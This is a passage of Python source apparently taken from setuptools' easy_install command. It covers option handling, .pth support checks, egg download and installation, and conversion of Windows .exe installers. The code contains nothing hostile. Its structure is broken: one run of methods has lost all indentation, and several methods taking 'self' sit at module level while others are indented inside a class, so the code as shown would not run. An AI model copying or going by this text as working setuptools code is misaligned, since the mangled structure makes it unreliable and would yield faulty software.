        """Resolve all option values, wiring in defaults from the distutils
        install commands, validating site dirs, and building the package
        index.  The ordering of the steps below is significant."""
        if self.version:
            print('setuptools %s' % get_distribution('setuptools').version)
            sys.exit()

        py_version = sys.version.split()[0]
        prefix, exec_prefix = get_config_vars('prefix', 'exec_prefix')

        # Variables available for $-substitution in directory options.
        self.config_vars = {
            'dist_name': self.distribution.get_name(),
            'dist_version': self.distribution.get_version(),
            'dist_fullname': self.distribution.get_fullname(),
            'py_version': py_version,
            'py_version_short': py_version[0:3],
            'py_version_nodot': py_version[0] + py_version[2],
            'sys_prefix': prefix,
            'prefix': prefix,
            'sys_exec_prefix': exec_prefix,
            'exec_prefix': exec_prefix,
            # Only python 3.2+ has abiflags
            'abiflags': getattr(sys, 'abiflags', ''),
        }

        if site.ENABLE_USER_SITE:
            self.config_vars['userbase'] = self.install_userbase
            self.config_vars['usersite'] = self.install_usersite

        # fix the install_dir if "--user" was used
        # XXX: duplicate of the code in the setup command
        if self.user and site.ENABLE_USER_SITE:
            self.create_home_path()
            if self.install_userbase is None:
                raise DistutilsPlatformError(
                    "User base directory is not specified")
            self.install_base = self.install_platbase = self.install_userbase
            if os.name == 'posix':
                self.select_scheme("unix_user")
            else:
                self.select_scheme(os.name + "_user")

        self.expand_basedirs()
        self.expand_dirs()

        self._expand('install_dir', 'script_dir', 'build_directory',
                     'site_dirs')
        # If a non-default installation directory was specified, default the
        # script directory to match it.
        if self.script_dir is None:
            self.script_dir = self.install_dir

        if self.no_find_links is None:
            self.no_find_links = False

        # Let install_dir get set by install_lib command, which in turn
        # gets its info from the install command, and takes into account
        # --prefix and --home and all that other crud.
        self.set_undefined_options(
            'install_lib', ('install_dir', 'install_dir')
        )
        # Likewise, set default script_dir from 'install_scripts.install_dir'
        self.set_undefined_options(
            'install_scripts', ('install_dir', 'script_dir')
        )

        if self.user and self.install_purelib:
            self.install_dir = self.install_purelib
            self.script_dir = self.install_scripts
        # default --record from the install command
        self.set_undefined_options('install', ('record', 'record'))
        # Should this be moved to the if statement below? It's not used
        # elsewhere
        normpath = map(normalize_path, sys.path)
        self.all_site_dirs = get_site_dirs()
        if self.site_dirs is not None:
            site_dirs = [
                os.path.expanduser(s.strip()) for s in
                self.site_dirs.split(',')
            ]
            for d in site_dirs:
                if not os.path.isdir(d):
                    log.warn("%s (in --site-dirs) does not exist", d)
                elif normalize_path(d) not in normpath:
                    raise DistutilsOptionError(
                        d + " (in --site-dirs) is not on sys.path"
                    )
                else:
                    self.all_site_dirs.append(normalize_path(d))
        if not self.editable:
            self.check_site_dir()
        self.index_url = self.index_url or "https://pypi.python.org/simple"
        # shadow_path: site dirs plus install/script dirs, searched first.
        self.shadow_path = self.all_site_dirs[:]
        for path_item in self.install_dir, normalize_path(self.script_dir):
            if path_item not in self.shadow_path:
                self.shadow_path.insert(0, path_item)

        if self.allow_hosts is not None:
            hosts = [s.strip() for s in self.allow_hosts.split(',')]
        else:
            hosts = ['*']
        if self.package_index is None:
            self.package_index = self.create_index(
                self.index_url, search_path=self.shadow_path, hosts=hosts,
            )
        self.local_index = Environment(self.shadow_path + sys.path)

        if self.find_links is not None:
            if isinstance(self.find_links, basestring):
                self.find_links = self.find_links.split()
        else:
            self.find_links = []
        if self.local_snapshots_ok:
            self.package_index.scan_egg_links(self.shadow_path + sys.path)
        if not self.no_find_links:
            self.package_index.add_find_links(self.find_links)
        self.set_undefined_options('install_lib', ('optimize', 'optimize'))
        if not isinstance(self.optimize, int):
            try:
                self.optimize = int(self.optimize)
                if not (0 <= self.optimize <= 2):
                    raise ValueError
            except ValueError:
                raise DistutilsOptionError("--optimize must be 0, 1, or 2")

        if self.editable and not self.build_directory:
            raise DistutilsArgError(
                "Must specify a build directory (-b) when using --editable"
            )
        if not self.args:
            raise DistutilsArgError(
                "No urls, filenames, or requirements specified (see --help)")

        self.outputs = []
def _expand_attrs(self, attrs):
for attr in attrs:
val = getattr(self, attr)
if val is not None:
if os.name == 'posix' or os.name == 'nt':
val = os.path.expanduser(val)
val = subst_vars(val, self.config_vars)
setattr(self, attr, val)
def expand_basedirs(self):
"""Calls `os.path.expanduser` on install_base, install_platbase and
root."""
self._expand_attrs(['install_base', 'install_platbase', 'root'])
def expand_dirs(self):
"""Calls `os.path.expanduser` on install dirs."""
self._expand_attrs(['install_purelib', 'install_platlib',
'install_lib', 'install_headers',
'install_scripts', 'install_data', ])
def run(self):
if self.verbose != self.distribution.verbose:
log.set_verbosity(self.verbose)
try:
for spec in self.args:
self.easy_install(spec, not self.no_deps)
if self.record:
outputs = self.outputs
if self.root: # strip any package prefix
root_len = len(self.root)
for counter in range(len(outputs)):
outputs[counter] = outputs[counter][root_len:]
from distutils import file_util
self.execute(
file_util.write_file, (self.record, outputs),
"writing list of installed files to '%s'" %
self.record
)
self.warn_deprecated_options()
finally:
log.set_verbosity(self.distribution.verbose)
def pseudo_tempname(self):
"""Return a pseudo-tempname base in the install directory.
This code is intentionally naive; if a malicious party can write to
the target directory you're already in deep doodoo.
"""
try:
pid = os.getpid()
except:
pid = random.randint(0, maxsize)
return os.path.join(self.install_dir, "test-easy-install-%s" % pid)
def warn_deprecated_options(self):
pass
    def check_site_dir(self):
        """Verify that self.install_dir is .pth-capable dir, if needed"""

        instdir = normalize_path(self.install_dir)
        pth_file = os.path.join(instdir, 'easy-install.pth')

        # Is it a configured, PYTHONPATH, implicit, or explicit site dir?
        is_site_dir = instdir in self.all_site_dirs

        if not is_site_dir and not self.multi_version:
            # No? Then directly test whether it does .pth file processing
            is_site_dir = self.check_pth_processing()
        else:
            # make sure we can write to target dir
            testfile = self.pseudo_tempname() + '.write-test'
            test_exists = os.path.exists(testfile)
            try:
                if test_exists:
                    os.unlink(testfile)
                open(testfile, 'w').close()
                os.unlink(testfile)
            except (OSError, IOError):
                self.cant_write_to_target()

        if not is_site_dir and not self.multi_version:
            # Can't install non-multi to non-site dir
            raise DistutilsError(self.no_default_version_msg())

        if is_site_dir:
            if self.pth_file is None:
                self.pth_file = PthDistributions(pth_file, self.all_site_dirs)
        else:
            self.pth_file = None

        PYTHONPATH = os.environ.get('PYTHONPATH', '').split(os.pathsep)
        if instdir not in map(normalize_path, [_f for _f in PYTHONPATH if _f]):
            # only PYTHONPATH dirs need a site.py, so pretend it's there
            self.sitepy_installed = True
        elif self.multi_version and not os.path.exists(pth_file):
            self.sitepy_installed = True  # don't need site.py in this case
            self.pth_file = None  # and don't create a .pth file
        self.install_dir = instdir
    def cant_write_to_target(self):
        """Raise DistutilsError explaining that the install dir is not
        writable; called from an except block so sys.exc_info() carries the
        original failure."""
        template = """can't create or remove files in install directory
The following error occurred while trying to add or remove files in the
installation directory:
%s
The installation directory you specified (via --install-dir, --prefix, or
the distutils default setting) was:
%s
"""
        msg = template % (sys.exc_info()[1], self.install_dir,)

        if not os.path.exists(self.install_dir):
            msg += """
This directory does not currently exist.  Please create it and try again, or
choose a different installation directory (using the -d or --install-dir
option).
"""
        else:
            msg += """
Perhaps your account does not have write access to this directory?  If the
installation directory is a system-owned directory, you may need to sign in
as the administrator or "root" account.  If you do not have administrative
access to this machine, you may wish to choose a different installation
directory, preferably one that is listed in your PYTHONPATH environment
variable.
For information on other options, you may wish to consult the
documentation at:
  https://pythonhosted.org/setuptools/easy_install.html
Please make the appropriate changes for your system and try again.
"""
        raise DistutilsError(msg)
    def check_pth_processing(self):
        """Empirically verify whether .pth files are supported in inst. dir"""
        instdir = self.install_dir
        log.info("Checking .pth file support in %s", instdir)
        pth_file = self.pseudo_tempname() + ".pth"
        ok_file = pth_file + '.ok'
        ok_exists = os.path.exists(ok_file)
        try:
            if ok_exists:
                os.unlink(ok_file)
            dirname = os.path.dirname(ok_file)
            if not os.path.exists(dirname):
                os.makedirs(dirname)
            f = open(pth_file, 'w')
        except (OSError, IOError):
            self.cant_write_to_target()
        else:
            try:
                # The .pth file runs this snippet at interpreter startup;
                # the presence of ok_file afterwards proves .pth processing.
                f.write("import os; f = open(%r, 'w'); f.write('OK'); "
                        "f.close()\n" % (ok_file,))
                f.close()
                f = None
                executable = sys.executable
                if os.name == 'nt':
                    dirname, basename = os.path.split(executable)
                    alt = os.path.join(dirname, 'pythonw.exe')
                    if (basename.lower() == 'python.exe' and
                            os.path.exists(alt)):
                        # use pythonw.exe to avoid opening a console window
                        executable = alt

                from distutils.spawn import spawn

                spawn([executable, '-E', '-c', 'pass'], 0)

                if os.path.exists(ok_file):
                    log.info(
                        "TEST PASSED: %s appears to support .pth files",
                        instdir
                    )
                    return True
            finally:
                # Always clean up the probe files.
                if f:
                    f.close()
                if os.path.exists(ok_file):
                    os.unlink(ok_file)
                if os.path.exists(pth_file):
                    os.unlink(pth_file)
        if not self.multi_version:
            log.warn("TEST FAILED: %s does NOT support .pth files", instdir)
        return False
def install_egg_scripts(self, dist):
    """Write all the scripts for `dist`, unless scripts are excluded"""
    if not self.exclude_scripts and dist.metadata_isdir('scripts'):
        for name in dist.metadata_listdir('scripts'):
            # A "script" that is a directory (e.g. a Python 3
            # __pycache__ dir) is not installable -- skip it.
            if dist.metadata_isdir('scripts/' + name):
                continue
            body = dist.get_metadata('scripts/' + name)
            self.install_script(dist, name, body)
    self.install_wrapper_scripts(dist)
def add_output(self, path):
    """Record `path` as an output; for a directory, record every file
    beneath it (recursively)."""
    if not os.path.isdir(path):
        self.outputs.append(path)
        return
    for base, _dirs, files in os.walk(path):
        self.outputs.extend(os.path.join(base, fn) for fn in files)
def not_editable(self, spec):
    """Reject `spec` when running with --editable: filenames and URLs
    are only usable there via --find-links."""
    if not self.editable:
        return
    raise DistutilsArgError(
        "Invalid argument %r: you can't use filenames or URLs "
        "with --editable (except via the --find-links option)."
        % (spec,)
    )
def check_editable(self, spec):
    """In --editable mode, refuse to check `spec` out over an existing
    directory in the build area."""
    if not self.editable:
        return
    target = os.path.join(self.build_directory, spec.key)
    if os.path.exists(target):
        raise DistutilsArgError(
            "%r already exists in %s; can't do a checkout there" %
            (spec.key, self.build_directory)
        )
def easy_install(self, spec, deps=False):
    """Install `spec` (a Requirement, URL, or filename) and, depending
    on `deps`/--always-copy, its dependencies.

    Returns the installed Distribution (or None/[] in edge cases).
    The temporary download/build dir is always cleaned up.
    """
    tmpdir = tempfile.mkdtemp(prefix="easy_install-")
    download = None
    if not self.editable:
        self.install_site_py()
    try:
        if not isinstance(spec, Requirement):
            if URL_SCHEME(spec):
                # It's a url, download it to tmpdir and process
                self.not_editable(spec)
                download = self.package_index.download(spec, tmpdir)
                return self.install_item(None, download, tmpdir, deps,
                                         True)
            elif os.path.exists(spec):
                # Existing file or directory, just process it directly
                self.not_editable(spec)
                return self.install_item(None, spec, tmpdir, deps, True)
            else:
                # Plain string: parse it as a requirement spec.
                spec = parse_requirement_arg(spec)
        self.check_editable(spec)
        # Locate a matching distribution; --always-copy disallows
        # reusing already-installed/system eggs.
        dist = self.package_index.fetch_distribution(
            spec, tmpdir, self.upgrade, self.editable,
            not self.always_copy, self.local_index
        )
        if dist is None:
            msg = "Could not find suitable distribution for %r" % spec
            if self.always_copy:
                msg += " (--always-copy skips system and development eggs)"
            raise DistutilsError(msg)
        elif dist.precedence == DEVELOP_DIST:
            # .egg-info dists don't need installing, just process deps
            self.process_distribution(spec, dist, deps, "Using")
            return dist
        else:
            return self.install_item(spec, dist.location, tmpdir, deps)
    finally:
        # Always remove the temporary directory, even on error.
        if os.path.exists(tmpdir):
            rmtree(tmpdir)
def install_item(self, spec, download, tmpdir, deps, install_needed=False):
    """Install the file/dir `download` satisfying `spec`.

    Decides whether a real install is required (vs. reusing a local
    .egg already present in the local index), processes the resulting
    distribution(s), and returns the one matching `spec`, if any.
    """
    # Installation is also needed if file in tmpdir or is not an egg
    install_needed = install_needed or self.always_copy
    install_needed = install_needed or os.path.dirname(download) == tmpdir
    install_needed = install_needed or not download.endswith('.egg')
    install_needed = install_needed or (
        self.always_copy_from is not None and
        os.path.dirname(normalize_path(download)) ==
        normalize_path(self.always_copy_from)
    )
    if spec and not install_needed:
        # at this point, we know it's a local .egg, we just don't know if
        # it's already installed.
        for dist in self.local_index[spec.project_name]:
            if dist.location == download:
                break
        else:
            install_needed = True  # it's not in the local index
    log.info("Processing %s", os.path.basename(download))
    if install_needed:
        dists = self.install_eggs(spec, download, tmpdir)
        for dist in dists:
            self.process_distribution(spec, dist, deps)
    else:
        # Already-installed egg: just register/activate it.
        dists = [self.egg_distribution(download)]
        self.process_distribution(spec, dists[0], deps, "Using")
    if spec is not None:
        # Return whichever installed dist actually satisfies the spec.
        for dist in dists:
            if dist in spec:
                return dist
def select_scheme(self, name):
    """Sets the install directories by applying the install schemes."""
    # it's the caller's problem if they supply a bad name!
    scheme = INSTALL_SCHEMES[name]
    # Only fill in directories the user hasn't set explicitly.
    unset = [k for k in SCHEME_KEYS if getattr(self, 'install_' + k) is None]
    for key in unset:
        setattr(self, 'install_' + key, scheme[key])
def process_distribution(self, requirement, dist, deps=True, *info):
    """Register the installed `dist` (pth file, indexes, scripts), then
    resolve and install its dependencies as configured."""
    self.update_pth(dist)
    self.package_index.add(dist)
    # Replace any stale copy of this project in the local index.
    if dist in self.local_index[dist.key]:
        self.local_index.remove(dist)
    self.local_index.add(dist)
    self.install_egg_scripts(dist)
    self.installed_projects[dist.key] = dist
    log.info(self.installation_report(requirement, dist, *info))
    if (dist.has_metadata('dependency_links.txt') and
            not self.no_find_links):
        self.package_index.add_find_links(
            dist.get_metadata_lines('dependency_links.txt')
        )
    if not deps and not self.always_copy:
        return
    elif requirement is not None and dist.key != requirement.key:
        log.warn("Skipping dependencies for %s", dist)
        return  # XXX this is not the distribution we were looking for
    elif requirement is None or dist not in requirement:
        # if we wound up with a different version, resolve what we've got
        distreq = dist.as_requirement()
        requirement = requirement or distreq
        requirement = Requirement(
            distreq.project_name, distreq.specs, requirement.extras
        )
    log.info("Processing dependencies for %s", requirement)
    try:
        # Resolve against the local index; missing dists are installed
        # on demand via self.easy_install (passed as the installer).
        distros = WorkingSet([]).resolve(
            [requirement], self.local_index, self.easy_install
        )
    except DistributionNotFound as e:
        raise DistutilsError(
            "Could not find required distribution %s" % e.args
        )
    except VersionConflict as e:
        raise DistutilsError(e.report())
    if self.always_copy or self.always_copy_from:
        # Force all the relevant distros to be copied or activated
        for dist in distros:
            if dist.key not in self.installed_projects:
                self.easy_install(dist.as_requirement())
    log.info("Finished processing dependencies for %s", requirement)
def should_unzip(self, dist):
    """Decide whether `dist` must be installed unzipped."""
    if self.zip_ok is not None:
        # An explicit --zip-ok / --no-zip-ok setting wins.
        return not self.zip_ok
    # Otherwise unzip unless the egg is positively marked zip-safe.
    if dist.has_metadata('not-zip-safe'):
        return True
    return not dist.has_metadata('zip-safe')
def maybe_move(self, spec, dist_filename, setup_base):
    """Move a downloaded/unpacked source tree into --build-directory.

    Returns the directory the build should run from (either the moved
    location, or the original `setup_base` if the target exists).
    """
    dst = os.path.join(self.build_directory, spec.key)
    if os.path.exists(dst):
        # Never clobber an existing checkout; build in place instead.
        msg = ("%r already exists in %s; build directory %s will not be "
               "kept")
        log.warn(msg, spec.key, self.build_directory, setup_base)
        return setup_base
    if os.path.isdir(dist_filename):
        setup_base = dist_filename
    else:
        if os.path.dirname(dist_filename) == setup_base:
            os.unlink(dist_filename)  # get it out of the tmp dir
        contents = os.listdir(setup_base)
        if len(contents) == 1:
            dist_filename = os.path.join(setup_base, contents[0])
            if os.path.isdir(dist_filename):
                # if the only thing there is a directory, move it instead
                setup_base = dist_filename
    ensure_directory(dst)
    shutil.move(setup_base, dst)
    return dst
def install_wrapper_scripts(self, dist):
    """Generate and install wrapper scripts for `dist`'s entry points
    (no-op when scripts are excluded)."""
    if self.exclude_scripts:
        return
    writer = ScriptWriter.best()
    for args in writer.get_args(dist):
        self.write_script(*args)
def install_script(self, dist, script_name, script_text, dev_path=None):
    """Generate a legacy script wrapper and install it"""
    spec = str(dist.as_requirement())
    is_script = is_python_script(script_text, script_name)
    if is_script:
        # NOTE: the template is filled via `% locals()`, so local
        # variable names here (spec, dev_path, ...) are load-bearing.
        script_text = (ScriptWriter.get_header(script_text) +
                       self._load_template(dev_path) % locals())
    # 'b' mode: script bytes are written verbatim (already ASCII-ized).
    self.write_script(script_name, _to_ascii(script_text), 'b')
@staticmethod
def _load_template(dev_path):
    """
    There are a couple of template scripts in the package. This
    function loads one of them and prepares it for use.
    """
    # See https://bitbucket.org/pypa/setuptools/issue/134 for info
    # on script file naming and downstream issues with SVR4
    name = 'script (dev).tmpl' if dev_path else 'script.tmpl'
    return resource_string('setuptools', name).decode('utf-8')
def write_script(self, script_name, contents, mode="t", blockers=()):
    """Write an executable file to the scripts directory"""
    self.delete_blockers(  # clean up old .py/.pyw w/o a script
        [os.path.join(self.script_dir, x) for x in blockers]
    )
    log.info("Installing %s script to %s", script_name, self.script_dir)
    target = os.path.join(self.script_dir, script_name)
    self.add_output(target)
    mask = current_umask()
    if not self.dry_run:
        ensure_directory(target)
        if os.path.exists(target):
            os.unlink(target)
        # `mode` is "t" (text) or "b" (binary), appended to "w".
        f = open(target, "w" + mode)
        f.write(contents)
        f.close()
        # Make the script executable, honoring the user's umask.
        chmod(target, 0o777 - mask)
def install_eggs(self, spec, dist_filename, tmpdir):
    """Build and/or install eggs from `dist_filename`; returns a list
    of the installed Distribution objects."""
    # .egg dirs or files are already built, so just return them
    if dist_filename.lower().endswith('.egg'):
        return [self.install_egg(dist_filename, tmpdir)]
    elif dist_filename.lower().endswith('.exe'):
        return [self.install_exe(dist_filename, tmpdir)]
    # Anything else, try to extract and build
    setup_base = tmpdir
    if os.path.isfile(dist_filename) and not dist_filename.endswith('.py'):
        # Assume an archive (tar/zip/...) and unpack into tmpdir.
        unpack_archive(dist_filename, tmpdir, self.unpack_progress)
    elif os.path.isdir(dist_filename):
        setup_base = os.path.abspath(dist_filename)
    if (setup_base.startswith(tmpdir)  # something we downloaded
            and self.build_directory and spec is not None):
        setup_base = self.maybe_move(spec, dist_filename, setup_base)
    # Find the setup.py file
    setup_script = os.path.join(setup_base, 'setup.py')
    if not os.path.exists(setup_script):
        # Maybe the archive unpacked into a single subdirectory.
        setups = glob(os.path.join(setup_base, '*', 'setup.py'))
        if not setups:
            raise DistutilsError(
                "Couldn't find a setup script in %s" %
                os.path.abspath(dist_filename)
            )
        if len(setups) > 1:
            raise DistutilsError(
                "Multiple setup scripts in %s" %
                os.path.abspath(dist_filename)
            )
        setup_script = setups[0]
    # Now run it, and return the result
    if self.editable:
        log.info(self.report_editable(spec, setup_script))
        return []
    else:
        return self.build_and_install(setup_script, setup_base)
def egg_distribution(self, egg_path):
    """Return a Distribution for the egg at `egg_path` (an unpacked
    directory or a zipped egg file)."""
    if os.path.isdir(egg_path):
        meta = PathMetadata(egg_path, os.path.join(egg_path, 'EGG-INFO'))
    else:
        meta = EggMetadata(zipimport.zipimporter(egg_path))
    return Distribution.from_filename(egg_path, metadata=meta)
def install_egg(self, egg_path, tmpdir):
    """Copy/move/extract the egg at `egg_path` into the install dir
    and return its Distribution.

    Sources under `tmpdir` are moved; anything else is copied.  Import
    caches are refreshed on both success and failure so stale finders
    never point at replaced content.
    """
    destination = os.path.join(self.install_dir,
                               os.path.basename(egg_path))
    destination = os.path.abspath(destination)
    if not self.dry_run:
        ensure_directory(destination)
    dist = self.egg_distribution(egg_path)
    if not samefile(egg_path, destination):
        # Clear whatever currently occupies the destination.
        if os.path.isdir(destination) and not os.path.islink(destination):
            dir_util.remove_tree(destination, dry_run=self.dry_run)
        elif os.path.exists(destination):
            self.execute(os.unlink, (destination,), "Removing " +
                         destination)
        try:
            new_dist_is_zipped = False
            if os.path.isdir(egg_path):
                if egg_path.startswith(tmpdir):
                    f, m = shutil.move, "Moving"
                else:
                    f, m = shutil.copytree, "Copying"
            elif self.should_unzip(dist):
                self.mkpath(destination)
                f, m = self.unpack_and_compile, "Extracting"
            else:
                new_dist_is_zipped = True
                if egg_path.startswith(tmpdir):
                    f, m = shutil.move, "Moving"
                else:
                    f, m = shutil.copy2, "Copying"
            self.execute(f, (egg_path, destination),
                         (m + " %s to %s") %
                         (os.path.basename(egg_path),
                          os.path.dirname(destination)))
            # Refresh import caches that may reference the old egg;
            # zipimporter caches are only fixable for zipped dists.
            update_dist_caches(destination,
                               fix_zipimporter_caches=new_dist_is_zipped)
        except:
            update_dist_caches(destination, fix_zipimporter_caches=False)
            raise
    self.add_output(destination)
    return self.egg_distribution(destination)
def install_exe(self, dist_filename, tmpdir):
    """Convert a bdist_wininst .exe installer to an egg and install it."""
    # See if it's valid, get data
    cfg = extract_wininst_cfg(dist_filename)
    if cfg is None:
        raise DistutilsError(
            "%s is not a valid distutils Windows .exe" % dist_filename
        )
    # Create a dummy distribution object until we build the real distro
    dist = Distribution(
        None,
        project_name=cfg.get('metadata', 'name'),
        version=cfg.get('metadata', 'version'), platform=get_platform(),
    )
    # Convert the .exe to an unpacked egg
    egg_path = dist.location = os.path.join(tmpdir, dist.egg_name() +
                                            '.egg')
    egg_tmp = egg_path + '.tmp'
    _egg_info = os.path.join(egg_tmp, 'EGG-INFO')
    pkg_inf = os.path.join(_egg_info, 'PKG-INFO')
    ensure_directory(pkg_inf)  # make sure EGG-INFO dir exists
    dist._provider = PathMetadata(egg_tmp, _egg_info)  # XXX
    self.exe_to_egg(dist_filename, egg_tmp)
    # Write EGG-INFO/PKG-INFO
    if not os.path.exists(pkg_inf):
        f = open(pkg_inf, 'w')
        f.write('Metadata-Version: 1.0\n')
        for k, v in cfg.items('metadata'):
            if k != 'target_version':
                f.write('%s: %s\n' % (k.replace('_', '-').title(), v))
        f.close()
    script_dir = os.path.join(_egg_info, 'scripts')
    # delete entry-point scripts to avoid duping
    self.delete_blockers(
        [os.path.join(script_dir, args[0]) for args in
         ScriptWriter.get_args(dist)]
    )
    # Build .egg file from tmpdir
    bdist_egg.make_zipfile(
        egg_path, egg_tmp, verbose=self.verbose, dry_run=self.dry_run
    )
    # install the .egg
    return self.install_egg(egg_path, tmpdir)
def exe_to_egg(self, dist_filename, egg_tmp):
    """Extract a bdist_wininst to the directories an egg would use"""
    # Check for .pth file and set up prefix translations
    prefixes = get_exe_prefixes(dist_filename)
    to_compile = []
    native_libs = []
    top_level = {}
    # NOTE: `top_level` and `native_libs` are looked up by string via
    # locals()[name] at the end of this method -- do not rename them.

    def process(src, dst):
        # Unpack filter: translate the .exe's internal path to its
        # egg location; record .pyd/.dll and .py files for later.
        s = src.lower()
        for old, new in prefixes:
            if s.startswith(old):
                src = new + src[len(old):]
                parts = src.split('/')
                dst = os.path.join(egg_tmp, *parts)
                dl = dst.lower()
                if dl.endswith('.pyd') or dl.endswith('.dll'):
                    # Extension module: strip suffix, note package for
                    # top_level.txt, and record for native_libs.txt.
                    parts[-1] = bdist_egg.strip_module(parts[-1])
                    top_level[os.path.splitext(parts[0])[0]] = 1
                    native_libs.append(src)
                elif dl.endswith('.py') and old != 'SCRIPTS/':
                    top_level[os.path.splitext(parts[0])[0]] = 1
                    to_compile.append(dst)
                return dst
        if not src.endswith('.pth'):
            log.warn("WARNING: can't process %s", src)
        return None

    # extract, tracking .pyd/.dll->native_libs and .py -> to_compile
    unpack_archive(dist_filename, egg_tmp, process)
    stubs = []
    for res in native_libs:
        if res.lower().endswith('.pyd'):  # create stubs for .pyd's
            parts = res.split('/')
            resource = parts[-1]
            parts[-1] = bdist_egg.strip_module(parts[-1]) + '.py'
            pyfile = os.path.join(egg_tmp, *parts)
            to_compile.append(pyfile)
            stubs.append(pyfile)
            bdist_egg.write_stub(resource, pyfile)
    self.byte_compile(to_compile)  # compile .py's
    bdist_egg.write_safety_flag(
        os.path.join(egg_tmp, 'EGG-INFO'),
        bdist_egg.analyze_egg(egg_tmp, stubs))  # write zip-safety flag
    for name in 'top_level', 'native_libs':
        if locals()[name]:
            # Write EGG-INFO/top_level.txt and EGG-INFO/native_libs.txt.
            txt = os.path.join(egg_tmp, 'EGG-INFO', name + '.txt')
            if not os.path.exists(txt):
                f = open(txt, 'w')
                f.write('\n'.join(locals()[name]) + '\n')
                f.close()
def installation_report(self, req, dist, what="Installed"):
    """Helpful installation message for display to package users"""
    # NOTE: filled in via `% locals()` at the end -- the local variable
    # names (what, eggloc, name, version, extras) are part of the format.
    msg = "\n%(what)s %(eggloc)s%(extras)s"
    if self.multi_version and not self.no_report:
        msg += """
Because this distribution was installed --multi-version, before you can
import modules from this package in an application, you will need to
'import pkg_resources' and then use a 'require()' call similar to one of
these examples, in order to select the desired version:
pkg_resources.require("%(name)s") # latest installed version
pkg_resources.require("%(name)s==%(version)s") # this exact version
pkg_resources.require("%(name)s>=%(version)s") # this version or higher
"""
        if self.install_dir not in map(normalize_path, sys.path):
            msg += """
Note also that the installation directory must be on sys.path at runtime for
this to work. (e.g. by being the application's script directory, by being on
PYTHONPATH, or by being added to sys.path by your code.)
"""
    eggloc = dist.location
    name = dist.project_name
    version = dist.version
    extras = ''  # TODO: self.report_extras(req, dist)
    return msg % locals()
def report_editable(self, spec, setup_script):
    """Message describing where an editable checkout was extracted and
    how to activate it."""
    # Filled via `% locals()` -- names spec/dirname/python are used in
    # the template below.
    dirname = os.path.dirname(setup_script)
    python = sys.executable
    return """\nExtracted editable version of %(spec)s to %(dirname)s
If it uses setuptools in its setup script, you can activate it in
"development" mode by going to that directory and running::
%(python)s setup.py develop
See the setuptools documentation for the "develop" command for more info.
""" % locals()
def run_setup(self, setup_script, setup_base, args):
    """Run `setup_script` via the sandboxed run_setup, translating our
    verbosity/dry-run settings into distutils flags."""
    # Make sure the setup script imports our patched commands.
    sys.modules.setdefault('distutils.command.bdist_egg', bdist_egg)
    sys.modules.setdefault('distutils.command.egg_info', egg_info)
    args = list(args)
    if self.verbose > 2:
        args.insert(0, '-' + 'v' * (self.verbose - 1))
    elif self.verbose < 2:
        args.insert(0, '-q')
    if self.dry_run:
        args.insert(0, '-n')
    log.info(
        "Running %s %s", setup_script[len(setup_base) + 1:], ' '.join(args)
    )
    try:
        # Module-level (sandboxed) run_setup, not this method.
        run_setup(setup_script, args)
    except SystemExit as v:
        raise DistutilsError("Setup script exited with %s" % (v.args[0],))
def build_and_install(self, setup_script, setup_base):
    """Run bdist_egg for `setup_script` and install every resulting
    egg; returns the list of installed Distribution objects."""
    args = ['bdist_egg', '--dist-dir']
    # Build into a fresh temp dir next to the setup script.
    dist_dir = tempfile.mkdtemp(
        prefix='egg-dist-tmp-', dir=os.path.dirname(setup_script)
    )
    try:
        # Propagate our fetcher options into the child's setup.cfg.
        self._set_fetcher_options(os.path.dirname(setup_script))
        args.append(dist_dir)
        self.run_setup(setup_script, setup_base, args)
        all_eggs = Environment([dist_dir])
        eggs = []
        for key in all_eggs:
            for dist in all_eggs[key]:
                eggs.append(self.install_egg(dist.location, setup_base))
        if not eggs and not self.dry_run:
            log.warn("No eggs found in %s (setup script problem?)",
                     dist_dir)
        return eggs
    finally:
        rmtree(dist_dir)
        log.set_verbosity(self.verbose)  # restore our log verbosity
def _set_fetcher_options(self, base):
    """
    When easy_install is about to run bdist_egg on a source dist, that
    source dist might have 'setup_requires' directives, requiring
    additional fetching. Ensure the fetcher options given to easy_install
    are available to that command as well.
    """
    # find the fetch options from easy_install and write them out
    # to the setup.cfg file.
    ei_opts = self.distribution.get_option_dict('easy_install').copy()
    # Fetch-related option names; 'site_dirs' was previously listed
    # twice -- a membership test only needs each name once.
    fetch_directives = (
        'find_links', 'site_dirs', 'index_url', 'optimize',
        'allow_hosts',
    )
    fetch_options = {}
    for key, val in ei_opts.items():
        if key not in fetch_directives:
            continue
        # distutils option dicts map name -> (source, value).
        fetch_options[key.replace('_', '-')] = val[1]
    # create a settings dictionary suitable for `edit_config`
    settings = dict(easy_install=fetch_options)
    cfg_filename = os.path.join(base, 'setup.cfg')
    setopt.edit_config(cfg_filename, settings)
def update_pth(self, dist):
    """Make `dist` the active entry in easy-install.pth (and keep
    self.shadow_path in sync); no-op when .pth handling is disabled."""
    if self.pth_file is None:
        return
    for d in self.pth_file[dist.key]:  # drop old entries
        if self.multi_version or d.location != dist.location:
            log.info("Removing %s from easy-install.pth file", d)
            self.pth_file.remove(d)
            if d.location in self.shadow_path:
                self.shadow_path.remove(d.location)
    if not self.multi_version:
        if dist.location in self.pth_file.paths:
            log.info(
                "%s is already the active version in easy-install.pth",
                dist
            )
        else:
            log.info("Adding %s to easy-install.pth file", dist)
            self.pth_file.add(dist)  # add new entry
            if dist.location not in self.shadow_path:
                self.shadow_path.append(dist.location)
    if not self.dry_run:
        self.pth_file.save()
        if dist.key == 'setuptools':
            # Ensure that setuptools itself never becomes unavailable!
            # XXX should this check for latest version?
            filename = os.path.join(self.install_dir, 'setuptools.pth')
            if os.path.islink(filename):
                os.unlink(filename)
            f = open(filename, 'wt')
            f.write(self.pth_file.make_relative(dist.location) + '\n')
            f.close()
def unpack_progress(self, src, dst):
    """Progress filter for unpacking: log each file, never skip any."""
    log.debug("Unpacking %s to %s", src, dst)
    # only unpack-and-compile skips files for dry run
    return dst
def unpack_and_compile(self, egg_path, destination):
    """Extract a zipped egg into `destination`, byte-compiling its .py
    files and making native libraries executable."""
    to_compile = []
    to_chmod = []

    def pf(src, dst):
        # Unpack filter: remember files that need post-processing.
        if dst.endswith('.py') and not src.startswith('EGG-INFO/'):
            to_compile.append(dst)
        elif dst.endswith('.dll') or dst.endswith('.so'):
            to_chmod.append(dst)
        self.unpack_progress(src, dst)
        # Returning None makes unpack_archive skip the file (dry run).
        return not self.dry_run and dst or None

    unpack_archive(egg_path, destination, pf)
    self.byte_compile(to_compile)
    if not self.dry_run:
        for f in to_chmod:
            # Add read/execute bits; mask off setuid/setgid-style bits.
            mode = ((os.stat(f)[stat.ST_MODE]) | 0o555) & 0o7755
